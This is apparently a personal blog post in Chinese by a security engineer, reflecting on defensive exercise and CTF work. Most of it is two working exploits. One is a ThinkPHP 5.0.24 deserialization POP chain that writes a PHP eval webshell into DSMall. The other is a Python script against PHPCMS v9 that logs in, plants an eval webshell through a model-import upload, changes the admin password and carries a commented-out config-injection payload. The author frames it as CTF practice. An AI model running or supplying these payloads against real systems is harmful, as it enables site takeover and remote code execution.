入職以來的碎碎念
阿新 • • 發佈:2020-12-10
將近四個月沒發文章,因為工作確實挺忙,另外甲方工作技術能力提升會稍微慢點,入職四個月可以分為兩個階段,8-11月忙於hw,11到現在忙於CTF。
第一階段
8月入職以來,單位培訓一週就開始忙於hw,說來也是可笑,去年還是在攻擊隊搞滲透,今年就變成防守方。單位3月就開始忙於hw,上安全裝置,重新部署一些架構,慚愧沒有早來實習。說說正式hw做的一些工作,單位領導知道我是攻擊隊出來的,交給我第一個任務就是對薄弱網路區域進行滲透測試,我帶著廠商的幾個兄弟,確實也挖到不少漏洞,具體漏洞就不細說了,搞到一臺伺服器看網絡卡是通生產網的,當時興奮的不行,可惜那臺只是配了IP並沒有加路由,出了一份滲透報告,getshell了不少也算是能給領導交差。正式hw階段,開始不熟悉單位的網路架構,安全裝置部署情況,也是廠商兄弟和同事幫忙介紹,巧的是得到原單位抽籤抽到我們,快向原單位同事打探下情況,是否準備0day,更巧的是另一個同事離職去xx當負責人派的小弟來我們這幫忙,後面正式hw工作,主要還是負責應急、溯源和盯監控裝置,還寫了一份記憶體馬查殺的手冊。期間主要還是熟悉單位的業務架構,不得不佩服小hw時,xxx單位的滲透報告,著實是學了一手,所有滲透手法、知識點全都具備,如何能夠在短時間串聯起來直搗黃龍才是滲透最難的,期間也出了很值得學習的溯源報告,最終成績也是相當可以,最值得一提的是,工作確實認識好多廠商厲害的大佬,id就不說了,也認識了北郵的朋友搞java web的,跟他也是相談甚歡,所有研究方向和想法基本一致,後來也是幫他內推了好多各大實驗室,基本復刻我去年走的路,最終也是成功進入到夢寐以求的一個單位,不得不佩服小兄弟剛20出頭能力已經相當可以了,以後前途不可估量。
第二階段
hw結束後開始忙於掃尾工作,寫各種報告、總結,最近結果也是剛揭曉,履歷上可以加上一筆了。後面組長將滲透測試的活交給我來做,開始還是身體力行親自做,後來駐場的人過來,把這些活安排下去了,u1s1做這種系統黑盒測試,對技術提升就那樣吧,遇到難搞的系統才會親自上陣。還有對工作的感觸,就是有的師傅是用心在做安全,有的卻是在混日子,開始想著駐場一年帶帶他,來年技術能力有個質的飛躍,後來發現他確實只是混日子,算了對某些人確實沒太多期望,後面也不想跟他交流太多。有的駐場比較靈性也聽話,後面想著帶著他把codeql在單位落地,搞一個自研的程式碼審計工具,挖一挖簡單漏洞。後來就準備單位組織的CTF,期間同事寫了種馬的框架,awd線下的框架,waf和檔案監控程式,內網滲透的check-ist、awd-checklist,這些寫的工具暫不開源了,有機會發出來。發現今年線下賽和以往明顯不同,考的基礎程式碼審計能力,不存在以前的手速大賽情況了。賽題也比較基礎了。唯一一個DSMall系統利用ThinkPHP5.0.24 POP鏈反序列化寫shell還是挺有意思的。具體分析看下面吧,在linux繞過死亡exit,poc貼下面了,巨坑的是這個poc在MAC上寫shell寫不進去。
說說以後的工作計劃吧。
1、手頭幾本書看完(安恆紅寶書,0day攻防)
2、pwn撿起來,出得新書看起來。
3、codeql落地,寫一款自研的程式碼審計的掃描器。
4、單位安全運營和sdl工作。
<?php namespace think\process\pipes; use think\model\Pivot; class Pipes{ } class Windows extends Pipes{ private $files = []; function __construct(){ $this->files = [new Pivot()]; } } namespace think\model;#Relation use think\db\Query; abstract class Relation{ protected $selfRelation; protected $query; function __construct(){ $this->selfRelation = false; $this->query = new Query();#class Query } } namespace think\model\relation;#OneToOne HasOne use think\model\Relation; abstract class OneToOne extends Relation{ function __construct(){ parent::__construct(); } } class HasOne extends OneToOne{ protected $bindAttr = []; function __construct(){ parent::__construct(); $this->bindAttr = ["no","123"]; } } namespace think\console;#Output use think\session\driver\Memcached; class Output{ private $handle = null; protected $styles = []; function __construct(){ $this->handle = new Memcached();//目的呼叫其write() $this->styles = ['getAttr']; } } namespace think;#Model use think\model\relation\HasOne; use think\console\Output; use think\db\Query; abstract class Model{ protected $append = []; protected $error; public $parent;#修改處 protected $selfRelation; protected $query; protected $aaaaa; function __construct(){ $this->parent = new Output();#Output物件,目的是呼叫__call() $this->append = ['getError']; $this->error = new HasOne();//Relation子類,且有getBindAttr() $this->selfRelation = false;//isSelfRelation() $this->query = new Query(); } } namespace think\db;#Query use think\console\Output; class Query{ protected $model; function __construct(){ $this->model = new Output(); } } namespace think\session\driver;#Memcached use think\cache\driver\File; class Memcached{ protected $handler = null; function __construct(){ $this->handler = new File();//目的呼叫File->set() } } namespace think\cache\driver;#File class File{ protected $options = []; protected $tag; function __construct(){ $this->options = [ 'expire' => 0, 'cache_subdir' => false, 'prefix' => '', 'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php', 'data_compress' => false, ]; $this->tag = true; } } namespace think\model; use think\Model; class Pivot extends Model{ } use think\process\pipes\Windows; $obj=new Windows(); $res= ds_encrypt(base64_encode(serialize($obj))); // $res = base64_encode(serialize($obj)); echo $res; function ds_encrypt($txt, $key = '') { define('TIMESTAMP',time()); if (empty($txt)) return $txt; if (empty($key)) $key = md5('a2382918dbb49c8643f19bc3ab90ecf9'); $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_."; $ikey = "-x6g6ZWm2G9g_vr0Bo.pOq3kRIxsZ6rm"; $nh1 = rand(0, 64); $nh2 = rand(0, 64); $nh3 = rand(0, 64); $ch1 = $chars{$nh1}; $ch2 = $chars{$nh2}; $ch3 = $chars{$nh3}; $nhnum = $nh1 + $nh2 + $nh3; $knum = 0; $i = 0; while (isset($key{$i})) $knum += ord($key{$i++}); $mdKey = substr(md5(md5(md5($key . $ch1) . $ch2 . $ikey) . $ch3), $nhnum % 8, $knum % 8 + 16); $txt = base64_encode(TIMESTAMP . '_' . $txt); $txt = str_replace(array('+', '/', '='), array('-', '_', '.'), $txt); $tmp = ''; $j = 0; $k = 0; $tlen = strlen($txt); $klen = strlen($mdKey); for ($i = 0; $i < $tlen; $i++) { $k = $k == $klen ? 0 : $k; $j = ($nhnum + strpos($chars, $txt{$i}) + ord($mdKey{$k++})) % 64; $tmp .= $chars{$j}; } $tmplen = strlen($tmp); $tmp = substr_replace($tmp, $ch3, $nh2 % ++$tmplen, 0); $tmp = substr_replace($tmp, $ch2, $nh1 % ++$tmplen, 0); $tmp = substr_replace($tmp, $ch1, $knum % ++$tmplen, 0); return $tmp; }
下面寫的phpcms 後臺認證的getshell poc,輸入驗證碼cookie,ip就能打,實際寫這個就是為了寫寫認證後的poc編寫,requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})會給以後的session都新增上cookie,
下面是一次session會話會新增cookie。
mycookie = { "PHPSESSID":"56v9clgo1kdfo3q5q8ck0aaaaa" }
x = requests.session()
x.get("http://127.0.0.1:80",cookies = mycookie)
除錯用:
print(dict(session.cookies)) //請求前的cookie
print(dict(res1.cookies)) //請求後的cookie
#encoding: utf-8
#驗證碼圖片地址:http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login
import requests
import re
import random
def login(ip,code,cookie):
session = requests.session()
requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=login&dosubmit=1"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login&pc_hash=", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
burp0_data = {"dosubmit": '', "username": "phpcms", "password": "phpcms", "code": code}
res1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
print(re.findall('330px">(.+)</div>',res1.text)[0])
# print(dict(session.cookies))
# print(dict(res1.cookies))
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=public_main"
burp0_headers = {"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&pc_hash",
"Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "close"}
res2 = session.get(burp0_url, headers=burp0_headers)
# print(dict(session.cookies))
# print(dict(res2.cookies))
pc_hash = re.findall('var pc_hash = \'(.+)\';',res2.text)[0]
print('pc_hash: '+pc_hash)
# print(res2.text)
#upload getshell
modelname = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
tablename = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
description = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=member&c=member_model&a=add"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.155.1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryXKC2cbu1uVQg3Tr3", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.155.1/phpcms_v9/index.php?m=member&c=member_model&a=add&pc_hash=gGF834", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
burp0_data = "------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[modelname]\"\r\n\r\n"+modelname+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[tablename]\"\r\n\r\n"+tablename+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[description]\"\r\n\r\n"+description+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"model_import\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\narray(1);$b=file_put_contents(\".cache202012047548.php\",'<?php eval($_REQUEST[z]);?>');\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"dosubmit\"\r\n\r\n\xe6\x8f\x90\xe4\xba\xa4\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"pc_hash\"\r\n\r\n"+pc_hash+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3--\r\n"
res3 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
print(res3.text)
# change_pwd
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.199.181",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://192.168.199.181//phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd&menuid=971&pc_hash="+pc_hash,
"Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "close"}
burp0_data = {"info[userid]": "1", "info[username]": "phpcms", "old_password": "phpcms", "new_password": "nongxinyin",
"new_pwdconfirm": "nongxinyin", "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash}
res5 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
# print(res5.text)
print(re.findall('max-width:330px">(.+)</div>',res5.text)[0])
#
#modify system.config getshell
# burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=setting&a=save"
# burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163",
# "Content-Type": "application/x-www-form-urlencoded",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
# "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=setting&a=init&&tab=2&menuid=979&pc_hash="+pc_hash,
# "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
# "Connection": "close"}
# burp0_data = {"setting[admin_email]": "[email protected]", "setting[category_ajax]": '', "setconfig[gzip]": "1",
# "setconfig[attachment_stat]": "1", "setconfig[js_path]": "http://172.28.161.163/phpcms_v9/statics/js/",
# "setconfig[css_path]": "http://172.28.161.163/phpcms_v9/statics/css/",
# "setconfig[img_path]": "http://172.28.161.163/phpcms_v9/statics/images/",
# "setconfig[upload_url]": "http://172.28.161.163/phpcms_v9/uploadfile/", "setconfig[admin_log]": "1",
# "setconfig[errorlog]": "1", "setting[errorlog_size]": "20", "setting[maxloginfailedtimes]": "8",
# "setting[minrefreshtime]": "2", "setconfig[admin_url]": '', "setconfig[phpsso]": "1",
# "setconfig[phpsso_appid]": "1",
# "setconfig[phpsso_api_url]": "http://172.28.161.163/phpcms_v9/phpsso_server",
# "setconfig[phpsso_auth_key]": "NHeSSQfQfxsXQCPcxs99EtYSDiGI6pey", "setconfig[phpsso_version]": "1",
# "setting[mail_type]": "1", "setting[mail_server]": "smtp.qq.com", "setting[mail_port]": "25",
# "setting[mail_from]": "[email protected]", "setting[mail_auth]": "1",
# "setting[mail_user]": "[email protected]", "setting[mail_password]": '', "mail_to": '',
# "setconfig[snda_akey]": "\\',@@eval($_POST[z]),//", "setconfig[snda_skey]": '',
# "setconfig[sina_akey]": '', "setconfig[sina_skey]": '', "setconfig[qq_akey]": '',
# "setconfig[qq_skey]": '', "setconfig[qq_appid]": '', "setconfig[qq_appkey]": '',
# "setconfig[qq_callback]": '', "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash }
# res4 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
# # print(res4.text)
# print(re.findall('-width:330px">(.+)</div>',res4.text)[0])
login('192.168.155.1','anwz','aic2c5br7fmmak60b28fu0h422')
https://www.anquanke.com/post/id/203461
https://xz.aliyun.com/t/7082
https://github.com/Ares-X/VulWiki/blob/a8a7d4d4d1530681e5b7f18daf7f471f7ff5c010/Web安全/Thinkphp/Thinkphp 反序列化漏洞/Thinkphp 5.0.24 反序列化漏洞.md
https://xz.aliyun.com/t/7457
https://blog.csdn.net/qq_45691294/article/details/109279879